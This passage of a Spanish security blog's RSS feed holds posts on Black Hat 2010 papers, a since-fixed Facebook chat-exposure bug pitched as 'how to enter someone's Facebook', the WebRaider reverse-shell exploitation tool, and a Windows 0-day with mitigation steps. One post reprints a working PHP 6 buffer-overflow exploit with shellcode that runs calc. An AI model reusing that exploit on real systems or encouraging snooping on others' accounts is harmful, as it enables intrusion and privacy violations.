href="https://media.blackhat.com/bh-us-10/presentations/deVries/BlackHat-USA-2010-deVries-Attacking-Java-Clients-slides.pdf">eVries Attacking Java Clients  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Vuksan_Pericin/BlackHat-USA-2010-Vuksan-Pericin-TitanMist-wp.pdf">Vuksan Pericin TitanMist</a><a
href="http://www.dragonjar.org">.</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Vuksan_Pericin/BlackHat-USA-2010-Vuksan-Pericin-TitanMist-slides.pdf">Vuksan Pericin TitanMist  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Waisman/BlackHat-USA-2010-Waisman-APT-slides.pdf">Waisman APT  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Wicherski/BlackHat-USA-2010-Wicherski-dirtbox-x86-windows-emulator-slides.pdf">Wicherski dirtbox x86 windows emulator  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Yerazunis/BlackHat-USA-2010-Yerazunis-Confidential-Mail-Filtering-wp.pdf">Yerazunis Confidential Mail Filtering</a></li></ul><p><strong>Mas Información:</strong><br
/> <a
href="https://www.blackhat.com/html/bh-us-10/bh-us-10-archives.html">Blackhat USA 2010 Media Archives</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/memorias-25c3.xhtml" title="Memoras del Chaos Communication Congress 25">Memoras del Chaos Communication Congress 25</a></li><li><a
href="http://www.dragonjar.org/multiples-distribuciones-de-seguridad-en-tu-usb-con-katana.xhtml" title="Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB">Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB</a></li><li><a
href="http://www.dragonjar.org/buffer-overflow-en-php-6-dev.xhtml" title="Buffer Overflow en PHP 6 Dev">Buffer Overflow en PHP 6 Dev</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a
href="http://www.dragonjar.org/problema-de-seguridad-en-bios-de-boards-intel.xhtml" title="Problema de Seguridad en BIOS de Boards Intel">Problema de Seguridad en BIOS de Boards Intel</a></li><li><a
href="http://www.dragonjar.org/bugcon.xhtml" title="BugCON 2012">BugCON 2012</a></li><li><a
href="http://www.dragonjar.org/nmap-5-0.xhtml" title="NMap 5.50">NMap 5.50</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-en-timthumb-php-afecta-millones-de-blogs-con-wordpress.xhtml" title="Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress">Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/memorias-del-black-hat-usa-2010.xhtml/feed</wfw:commentRss> <slash:comments>6</slash:comments> </item> <item><title>como entrar al facebook de otra persona</title><link>http://www.dragonjar.org/entrar-en-facebook-de-otra-persona.xhtml</link> <comments>http://www.dragonjar.org/entrar-en-facebook-de-otra-persona.xhtml#comments</comments> <pubDate>Wed, 05 May 2010 19:27:47 +0000</pubDate> <dc:creator>Axiacamus</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[Protección de la Información]]></category> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[abrir cuenta facebook]]></category> <category><![CDATA[Bug]]></category> <category><![CDATA[como entrar al facebook de otra persona]]></category> <category><![CDATA[como robar contraseña facebook]]></category> <category><![CDATA[Conversaciones]]></category> <category><![CDATA[crackear facebook]]></category> <category><![CDATA[Cuenta]]></category> <category><![CDATA[entrar cuenta facebook]]></category> <category><![CDATA[entrar en mi cuenta facebook]]></category> <category><![CDATA[espiar contactos]]></category> <category><![CDATA[espiar en facebook]]></category> <category><![CDATA[espiar facebook]]></category> <category><![CDATA[espiar fotos facebook]]></category> <category><![CDATA[Facebook]]></category> <category><![CDATA[jackear facebook]]></category> <category><![CDATA[Privacidad]]></category> <category><![CDATA[recuperar facebook]]></category> <category><![CDATA[robar facebook]]></category> <category><![CDATA[Seguridad]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4269</guid> <description><![CDATA[como entrar al facebook de otra persona, es una pregunta que muchos usuarios de Facebook se hacen, ya sea por que quieren entrar al facebook de otra persona (novia, novio, jefe, etc..) por motivos personales, o por simple curiosidad; Hoy al entrar en Facebook me encontré con la sorpresa que el Chat no funcionaba, al [...]]]></description> <content:encoded><![CDATA[<p><span
style="color: #0000ff;"><em><a
href="http://www.dragonjar.org/tag/como-entrar-al-facebook-de-otra-persona" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con como entrar al facebook de otra persona">como entrar al facebook de otra persona</a></em>, es una pregunta que muchos usuarios de <a
href="http://www.dragonjar.org/tag/facebook" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Facebook">Facebook</a> se hacen, ya sea por que quieren <span
style="text-decoration: underline;">entrar al facebook de otra persona</span> (novia, novio, jefe, etc..) por motivos personales, o por simple curiosidad; Hoy al entrar en Facebook me encontré con la sorpresa que el Chat no funcionaba, al pasar el mouse por encima decía que estaba en mantenimiento, después de un par de horas vi que seguía sin funcionar, me di a la tarea de investigar que pasaba  y me pregunté alguna persona habrá hackeado Facebook&#8230;</span></p><p
style="text-align: center;"><span
style="color: #0000ff;"><img
class="aligncenter" title="como entrar al facebook de otra persona" src="http://i.imgur.com/iM6BZ.jpg" alt="iM6BZ como entrar al facebook de otra persona"  /></span></p><p><span
style="color: #0000ff;">Aquella pregunta que siempre hacen las personas, sobre si es posible entrar al facebook de otra persona o &#8221;hackear una <a
href="http://www.dragonjar.org/tag/cuenta" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Cuenta">cuenta</a> de Facebook&#8221;  fue respondida esta mañana, la pregunta la realizan algunas personas por curiosidad o por querer saber cosas como por ejemplo si su pareja le está siendo infiel, por lo cual es muy frecuente que hagan búsquedas en Google del tipo <strong>¿cómo saber la contraseña de Facebook? o ¿como entrar al facebook de otra persona? </strong>, pero lo más sorprendente durante mi búsqueda para saber qué era lo que pasaba, fue enterarme que un fallo en Facebook permitía con unos sencillos pasos y tan solo unos clics (nada de programación, ni compilar códigos ni nada) podíamos estar frente a la cuenta de cualquiera de nuestros contactos, resolviendo la pregunta de muchos, como entrar al facebook de otra persona.</span><span
id="more-4269"></span><br
/><script type="text/javascript">// <![CDATA[
 google_ad_client = "ca-pub-5474472965666825"; /* Bloque - Facebook */ google_ad_slot = "4197199783"; google_ad_width = 200; google_ad_height = 90;
// ]]&gt;</script><br
/><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">// <![CDATA[</p>
<p>// ]]&gt;</script></p><h2>como entrar al facebook de otra persona</h2><p><span
style="color: #0000ff;">El fallo o <a
href="http://www.dragonjar.org/tag/bug" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Bug">bug</a> en Facebook se encontraba en la configuración de <a
href="http://www.dragonjar.org/tag/privacidad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Privacidad">privacidad</a>, donde podíamos ver la manera en que otros usuarios ven nuestro perfil, lo que sucedía era que realmente cargaba el perfil de ese usuario y nos permitía ver sus <a
href="http://www.dragonjar.org/tag/conversaciones" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Conversaciones">conversaciones</a>, historiales, solicitudes y algunos detalles de la cuenta que dejaban ver información sensibler resolviendo todo&#8230; como entrar al facebook de otra persona.</span></p><p><span
style="color: #0000ff;">Cabe destacar que hoy mismo fue solucionado este fallo por lo que no podras  entrar al facebook de otra persona y ya está de nuevo el chat en funcionamiento, sin embargo me quedan dudas acerca de la <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> de esta famosa red social, ya que era un fallo bastante grave y realmente es un descuido serio en la programación de la misma.</span></p><h1>como entrar al facebook de otra persona</h1><p
style="text-align: center;"><span
style="color: #0000ff;"><object
width="480" height="385" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param
name="allowFullScreen" value="true" /><param
name="allowscriptaccess" value="always" /><param
name="src" value="http://www.youtube.com/v/ny8ui4delEo&amp;hl=es_ES&amp;fs=1&amp;" /><param
name="allowfullscreen" value="true" /><embed
width="480" height="385" type="application/x-shockwave-flash" src="http://www.youtube.com/v/ny8ui4delEo&amp;hl=es_ES&amp;fs=1&amp;" allowFullScreen="true" allowscriptaccess="always" allowfullscreen="true" /></object></span></p><p><span
style="color: #0000ff;"><span
style="text-decoration: underline;">¿como entrar al facebook de otra persona?</span> ya sabes, y de nuevo te dejo estas recomendación para que </span><a
href="http://anonym-url.com/go.php?to=http://www.dragonjar.org/configurar-privacidad-en-redes-sociales.xhtml"><span
style="color: #0000ff;">configures adecuadamente tus niveles de privacidad, en las diferentes redes sociales</span></a><span
style="color: #0000ff;">, no agregues personas que no conoces a tu cuenta y mantente al tanto de las noticias sobre fallos de seguridad en las redes sociales que utilizas, de esta forma las personas no se preguntaran como entrar al facebook de otra persona, para ingresar a tu cuenta.</span></p><p><span
style="text-decoration: underline;"><span
style="color: #000000;"><strong>Más Información para saber como entrar al facebook de otra persona:</strong></span></span><br
/> <a
href="http://anonym-url.com/go.php?to=http://eu.techcrunch.com/2010/05/05/video-major-facebook-security-hole-lets-you-view-your-friends-live-chats/"><span
style="color: #0000ff;">Major Facebook security hole lets you view your friends’ live chats</span></a><br
/> <a
href="http://eu.techcrunch.com/2010/05/05/video-major-facebook-security-hole-lets-you-view-your-friends-live-chats/"><span
style="color: #0000ff;">como entrar al facebook de otra persona</span></a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/la-policia-nacional-colombiana-en-las-redes-sociales.xhtml" title="La Policía Nacional Colombiana en las Redes Sociales ">La Policía Nacional Colombiana en las Redes Sociales </a></li><li><a
href="http://www.dragonjar.org/revisa-tu-privacidad-en-facebook.xhtml" title="Revisa tu privacidad en Facebook">Revisa tu privacidad en Facebook</a></li><li><a
href="http://www.dragonjar.org/guia-oficial-de-seguridad-en-facebook.xhtml" title="Guía oficial de seguridad en Facebook ">Guía oficial de seguridad en Facebook </a></li><li><a
href="http://www.dragonjar.org/10-consejos-para-proteger-los-ninos-en-internet.xhtml" title="10 Consejos para proteger los Niños en Internet">10 Consejos para proteger los Niños en Internet</a></li><li><a
href="http://www.dragonjar.org/dos-en-wordpress.xhtml" title="Denegacion de Servicio en WordPress">Denegacion de Servicio en WordPress</a></li><li><a
href="http://www.dragonjar.org/problemas-de-seguridad-en-wordpress-2-8-2-actualiza-a-wordpress-2-8-3.xhtml" title="Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3">Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3</a></li><li><a
href="http://www.dragonjar.org/infeccion-virus-a-traves-de-redes-sociales.xhtml" title="Infección Virus a través de Redes Sociales">Infección Virus a través de Redes Sociales</a></li><li><a
href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/entrar-en-facebook-de-otra-persona.xhtml/feed</wfw:commentRss> <slash:comments>297</slash:comments> </item> <item><title>Buffer Overflow en PHP 6 Dev</title><link>http://www.dragonjar.org/buffer-overflow-en-php-6-dev.xhtml</link> <comments>http://www.dragonjar.org/buffer-overflow-en-php-6-dev.xhtml#comments</comments> <pubDate>Mon, 03 May 2010 07:48:30 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[0day]]></category> <category><![CDATA[Bug]]></category> <category><![CDATA[Codigo]]></category> <category><![CDATA[Exploit]]></category> <category><![CDATA[PHP]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4248</guid> <description><![CDATA[Recientemente fue descubierto un fallo grave de seguridad en la versión de desarrollo de PHP 6, el lenguaje de programación mas utilizado para realizar aplicaciones web. El problema se encuentra en la funcion str_transliterate() que permite &#8220;traducir&#8221; un texto de un lenguaje a otro, pero a su vez no valida adecuadamente los parámetros de entrada [...]]]></description> <content:encoded><![CDATA[<p>Recientemente fue descubierto un fallo grave de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> en la versión de desarrollo de PHP 6, el lenguaje de programación mas utilizado para realizar aplicaciones <a
href="http://www.dragonjar.org/tag/web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Web">web</a>.</p><p
style="text-align: center;"><img
class="alignnone" src="http://i.imgur.com/p7dDW.jpg" alt="p7dDW Buffer Overflow en PHP 6 Dev" width="500" height="273" title="Buffer Overflow en PHP 6 Dev" /></p><p>El problema se encuentra en la funcion str_transliterate() que permite &#8220;traducir&#8221; un texto de un lenguaje a otro, pero a su vez no valida adecuadamente los parámetros de entrada y permite la ejecución de código por medio de un buffer overflow.<span
id="more-4248"></span></p><p>Les dejo una <a
href="http://www.exploit-db.com/exploits/12051">PoC que explota esta vulnerabilidad </a>sobre servidor Apache, corriendo en <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">Windows</a> <a
href="http://www.dragonjar.org/tag/xp" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con XP">XP</a> SP3 y permite ejecutar la calculadora del sistema:</p><blockquote><p><code># Title: PHP 6.0 Dev str_transliterate() <a
href="http://www.dragonjar.org/tag/0day" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con 0day">0Day</a> Buffer Overflow <a
href="http://www.dragonjar.org/tag/exploit" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Exploit">Exploit</a><br
/> # EDB-ID: 12051<br
/> # CVE-ID: ()<br
/> # OSVDB-ID: ()<br
/> # Author: Pr0T3cT10n<br
/> # Published: 2010-04-04<br
/> # Verified: yes<br
/> # Download Exploit Code<br
/> # Download Vulnerable app</code></p><p><code>&lt;?php<br
/> error_reporting(0);<br
/> #####################################################################<br
/> ## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit<br
/> ## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev<br
/> ## Buffer Overflow<br
/> ## <a
href="http://www.dragonjar.org/tag/bug" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Bug">Bug</a> discovered by Pr0T3cT10n, &lt;pr0t3ct10n@gmail.com&gt;<br
/> ## Exploited by TheLeader, Debug<br
/> ## SP. Thanks: HDM<br
/> ## http://www.nullbyte.org.il<br
/> #####################################################################<br
/> ## This code should exploits a buffer overflow in the str_transliterate() function to call WinExec and execute CALC<br
/> ## Take a look, 'unicode.semantics' has to be on!<br
/> ## php.ini &gt; unicode.semantics = on<br
/> #####################################################################<br
/> if(ini_get_bool('unicode.semantics')) {<br
/> $buff = str_repeat("\u4141", 256);<br
/> $eip = "\u1445\u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll<br
/> $nops = str_repeat("\u9090", 20);</code></p><p><code># WinExec Calc XP SP3 HEB Unicode-encoded shellcode<br
/> $shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u250D\u7C86\uD3FF\u6163\u636C\u414E";</code></p><p><code># WinExec Calc XP SP3 EN Unicode-encoded shellcode (added by muts)<br
/> # $shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u23AD\u7C86\uD3FF\u6163\u636C\u414E";</code></p><p><code>$exploit = $buff.$eip.$nops.$shellcode;<br
/> str_transliterate(0, $exploit, 0);<br
/> } else {<br
/> exit("Error! 'unicode.semantics' has be on!\r\n");<br
/> }</code></p><p><code>function ini_get_bool($a) {<br
/> $b = ini_get($a);<br
/> switch (strtolower($b)) {<br
/> case 'on':<br
/> case 'yes':<br
/> case 'true':<br
/> return 'assert.active' !== $a;<br
/> case 'stdout':<br
/> case 'stderr':<br
/> return 'display_errors' === $a;<br
/> default:<br
/> return (bool) (int) $b;<br
/> }<br
/> }<br
/> ?&gt;</code></p></blockquote><p>Hay que recordar que esta versión de PHP aun esta en desarrollo, pero no deja de ser inquietante este tipo de problemas de carácter critico, en un lenguaje de programación tan extendido en la red, como lo es PHP.</p><p><strong>Mas Información:</strong><br
/> <a
title="Permanent Link: PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit" rel="bookmark" href="http://www.offensive-security.com/backtrack/php-6-0-dev-str_transliterate-0day-buffer-overflow-exploit/">PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit</a><br
/> <a
onclick="javascript:pageTracker._trackPageview('/outbound/article/www.exploit-db.com');" href="http://www.exploit-db.com/exploits/12051">Codigo en exploit-db.com</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a
href="http://www.dragonjar.org/0day-en-google-chrome.xhtml" title="0day en Google Chrome">0day en Google Chrome</a></li><li><a
href="http://www.dragonjar.org/memorias-del-black-hat-usa-2010.xhtml" title="Memorias del Black Hat USA 2010">Memorias del Black Hat USA 2010</a></li><li><a
href="http://www.dragonjar.org/dos-en-wordpress.xhtml" title="Denegacion de Servicio en WordPress">Denegacion de Servicio en WordPress</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-en-timthumb-php-afecta-millones-de-blogs-con-wordpress.xhtml" title="Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress">Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress</a></li><li><a
href="http://www.dragonjar.org/como-descubrir-vulnerabilidades-y-escribir-exploits.xhtml" title="Cómo descubrir vulnerabilidades y escribir exploits">Cómo descubrir vulnerabilidades y escribir exploits</a></li><li><a
href="http://www.dragonjar.org/exploit-0day-para-internet-explorer-en-windows-7.xhtml" title="Exploit 0day para Internet Explorer en Windows 7">Exploit 0day para Internet Explorer en Windows 7</a></li><li><a
href="http://www.dragonjar.org/multiples-distribuciones-de-seguridad-en-tu-usb-con-katana.xhtml" title="Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB">Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/buffer-overflow-en-php-6-dev.xhtml/feed</wfw:commentRss> <slash:comments>6</slash:comments> </item> <item><title>WebRaider &#8211; Explotación automatizada de aplicaciones Web</title><link>http://www.dragonjar.org/webraider-explotacion-automatizada-de-aplicaciones-web.xhtml</link> <comments>http://www.dragonjar.org/webraider-explotacion-automatizada-de-aplicaciones-web.xhtml#comments</comments> <pubDate>Thu, 08 Apr 2010 17:10:03 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Aplicacion]]></category> <category><![CDATA[Bug]]></category> <category><![CDATA[Herramienta]]></category> <category><![CDATA[Shell]]></category> <category><![CDATA[Vulnerabilidades]]></category> <category><![CDATA[Web]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4066</guid> <description><![CDATA[WebRaider es una herramienta para buscar y explotar vulnerabilidades de forma automatizada en aplicaciones web,  que se centra en la explotación de las aplicaciones web. La idea es simple, obtener una shell inversa o  de una inyección de SQL y una petición sin necesidad de utilizar un canal extra como TFTP, FTP para subir la [...]]]></description> <content:encoded><![CDATA[<p>WebRaider es una herramienta para buscar y explotar <a
href="http://www.dragonjar.org/tag/vulnerabilidades" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerabilidades">vulnerabilidades</a> de forma automatizada en aplicaciones <a
href="http://www.dragonjar.org/tag/web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Web">web</a>,  que se centra en la explotación de las aplicaciones <a
href="http://www.dragonjar.org/tag/web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Web">web</a>.</p><p
style="text-align: center;"><img
class="alignnone" title="Explotar aplicaciones web" src="http://img20.imageshack.us/img20/733/webraider1.png" alt="webraider1 WebRaider   Explotación automatizada de aplicaciones Web" width="320" height="290" /></p><p>La idea es simple, obtener una shell inversa o  de una inyección de SQL y una petición sin necesidad de utilizar un canal extra como TFTP, FTP para subir la carga inicial.<span
id="more-4066"></span></p><p>Las características de esta herramienta son las siguientes:</p><ul><li>Realiza solo una solicitud, por lo tanto es mas rápido</li><li>No es necesario ninguna herramienta, se puede simplemente utilizar el <a
href="http://www.dragonjar.org/tag/navegador" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Navegador">navegador</a> o un sencillo proxy MITM</li><li>Solo tienes que copiar y pegar el payload</li><li>Es posible diseñar un ataque CSRF para que nos devuelva una shell inversa</li><li>El payload no ocupa mas de 3500 caracteres</li><li>No son necesarias aplicaciones del sistema como FTP, TFTP o Debug.exe</li><li>Fácil de automatizar</li></ul><p>Aquí les dejo la presentación de la herramienta:</p><p
style="text-align: center;"><object
classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="355" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param
name="allowFullScreen" value="true" /><param
name="allowScriptAccess" value="never" /><param
name="src" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=oneclickownage-ferruhmavituna3-091217023327-phpapp01&amp;rel=0&amp;stripped_title=one-click-ownage-ferruh-mavituna-3" /><param
name="allowfullscreen" value="true" /><embed
type="application/x-shockwave-flash" width="425" height="355" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=oneclickownage-ferruhmavituna3-091217023327-phpapp01&amp;rel=0&amp;stripped_title=one-click-ownage-ferruh-mavituna-3" allowscriptaccess="never" allowfullscreen="true"></embed></object></p><p>De momento WebRaider solo funciona en entornos <a
href="http://www.dragonjar.org/tag/microsoft" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Microsoft">Microsoft</a> <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">Windows</a>, <a
href="http://code.google.com/p/webraider/source/list">pero al tener a la mano el código fuente</a> no creo que tarden mucho en hacerlo correr para cualquier GNU Linux o <a
href="http://www.dragonjar.org/tag/mac" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Mac">Mac</a> OS X utilizando WINE.</p> <address><span
style="color: #ff0000;"><strong>Advertencia:</strong> Posiblemente esta herramienta sea detectada por tu antivirus como una  &#8220;hacktool&#8221; o una amenaza para tu equipo, en ningún momento ha sido  modificada por la comunidad dragonjar y el archivo es descargado  directamente desde los servidores oficiales de WebRaider, tienes el  código fuente disponible para que lo revises y crees tu propio  ejecutable, en ningún momento la comunidad dragonjar ha introducido  software malicioso en esta u otras herramientas publicadas desde nuestro  portal.</span></address><h2 style="text-align: center;"><a
href="http://code.google.com/p/webraider/downloads/list">Descargar WebRaider Herramienta para explotación automatizadas en  aplicaciones web</a></h2><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/x5s-encuentra-fallos-xss-lfi-y-rfi-facilmente.xhtml" title="X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente">X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente</a></li><li><a
href="http://www.dragonjar.org/binging-footprinting-utilizando-bing.xhtml" title="Binging – Footprinting utilizando Bing">Binging – Footprinting utilizando Bing</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidades-web-que-permiten-acceder-al-sistema.xhtml" title="Vulnerabilidades Web que Permiten Acceder al Sistema">Vulnerabilidades Web que Permiten Acceder al Sistema</a></li><li><a
href="http://www.dragonjar.org/como-descubrir-vulnerabilidades-y-escribir-exploits.xhtml" title="Cómo descubrir vulnerabilidades y escribir exploits">Cómo descubrir vulnerabilidades y escribir exploits</a></li><li><a
href="http://www.dragonjar.org/presentacion-conceptos-basicos-seguridad-web.xhtml" title="Presentación de conceptos básicos en Seguridad Web">Presentación de conceptos básicos en Seguridad Web</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-desarrollo-seguro-aplicaciones-web-google.xhtml" title="Curso sobre desarrollo seguro de aplicaciones web por Google">Curso sobre desarrollo seguro de aplicaciones web por Google</a></li><li><a
href="http://www.dragonjar.org/top-10-fallos-de-seguridad-en-aplicaciones-web.xhtml" title="TOP 10 Fallos de Seguridad en Aplicaciones Web">TOP 10 Fallos de Seguridad en Aplicaciones Web</a></li><li><a
href="http://www.dragonjar.org/skipfish-escaner-seguridad-para-aplicaciones-web.xhtml" title="Skipfish, escáner de seguridad para aplicaciones web">Skipfish, escáner de seguridad para aplicaciones web</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/webraider-explotacion-automatizada-de-aplicaciones-web.xhtml/feed</wfw:commentRss> <slash:comments>12</slash:comments> </item> <item><title>Vulnerabilidad 0-day en todas las versiones de Windows</title><link>http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml</link> <comments>http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml#comments</comments> <pubDate>Wed, 20 Jan 2010 20:55:02 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[0day]]></category> <category><![CDATA[2003]]></category> <category><![CDATA[2008]]></category> <category><![CDATA[Bug]]></category> <category><![CDATA[Exploit]]></category> <category><![CDATA[Microsoft]]></category> <category><![CDATA[Server]]></category> <category><![CDATA[Vulnerabilidad]]></category> <category><![CDATA[Vulnerable]]></category> <category><![CDATA[Windows]]></category> <category><![CDATA[Windows XP]]></category> <category><![CDATA[XP]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3720</guid> <description><![CDATA[Microsoft no ha empezado el año bien con respecto a la seguridad de sus productos, mientras muchos todavía esperamos los parches oficiales para el 0-Day en el  Internet Explorer que se anuncio hace poco, hoy sale a la luz publica otro 0-Day que afecta a todas las versiones del sistema operativo Microsoft Windows. Este fallo [...]]]></description> <content:encoded><![CDATA[<p><a
href="http://www.dragonjar.org/tag/microsoft" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Microsoft">Microsoft</a> no ha empezado el año bien con respecto a la <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> de sus productos, <a
href="http://elladodelmal.blogspot.com/2010/01/protegere-contra-el-exploit-1day-de-ie.html">mientras muchos</a> todavía <a
href="http://www.sahw.com/wp/archivos/2010/01/20/dep-en-internet-explorer-8-tocado-y-hundido/">esperamos</a> los <a
href="http://blog.segu-info.com.ar/2010/01/parche-critico-para-ie-se-publica.html">parches oficiales para el 0-Day</a> en el  <a
href="http://www.sahw.com/wp/archivos/2010/01/19/0-day-en-internet-explorer-la-proteccion-dep-y-sus-limitaciones/">Internet Explorer</a> que se anuncio hace poco, hoy sale a la luz publica <a
href="http://www.securityfocus.com/data/vulnerabilities/exploits/37864.zip">otro 0-Day</a> que afecta a todas las versiones del sistema operativo Microsoft <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">Windows</a>.</p><p
style="text-align: center;"><img
class="alignnone" title="0day en Windows" src="http://farm3.static.flickr.com/2684/4291646450_4571861db7.jpg" alt="4291646450 4571861db7 Vulnerabilidad 0 day en todas las versiones de Windows" width="500" height="375" /></p><p>Este fallo descubierto por el investigador <a
href="http://taviso.decsystem.org/">Tavis Ormandy (miembro del equipo de seguridad de google)</a>, se aprovecha del soporte heredado de aplicaciones de 16 bits que Windows viene heredando desde su versión &#8220;NT&#8221; y permite a un atacante obtener privilegios de SYSTEM (máximo privilegio en el sistema) en un sistema <a
href="http://www.dragonjar.org/tag/vulnerable" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerable">vulnerable</a>.<span
id="more-3720"></span></p><p>Aunque todavía no existe un parche para este fallo de seguridad,  solo tendremos que deshabilitar el soporte para aplicaciones de 16 bits para proteger nuestro sistema, a continuación les dejo una serie de pasos a seguir para desactivarlo:</p><ol><li>Inicio/Ejecutar gpedit.msc</li><li>Abrir &#8220;Configuración de equipo&#8221;/ &#8220;Plantillas administrativas&#8221;/ &#8220;Componentes de Windows&#8221;/&#8221;Compatibilidad de aplicación&#8221;</li><li>Y habilitar &#8220;Impedir el acceso a aplicaciones de 16 bits&#8221;</li></ol><p>O puedes seguir los pasos de los siguientes vídeos según tu sistema operativo</p><p>Windows Server 2003:</p><p
style="text-align: center;"><object
classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param
name="allowFullScreen" value="true" /><param
name="allowscriptaccess" value="always" /><param
name="src" value="http://www.youtube.com/v/XRVI4iQ2Nug&amp;hl=es_ES&amp;fs=1&amp;" /><param
name="allowfullscreen" value="true" /><embed
type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/XRVI4iQ2Nug&amp;hl=es_ES&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p><p>Windows Server 2008</p><p
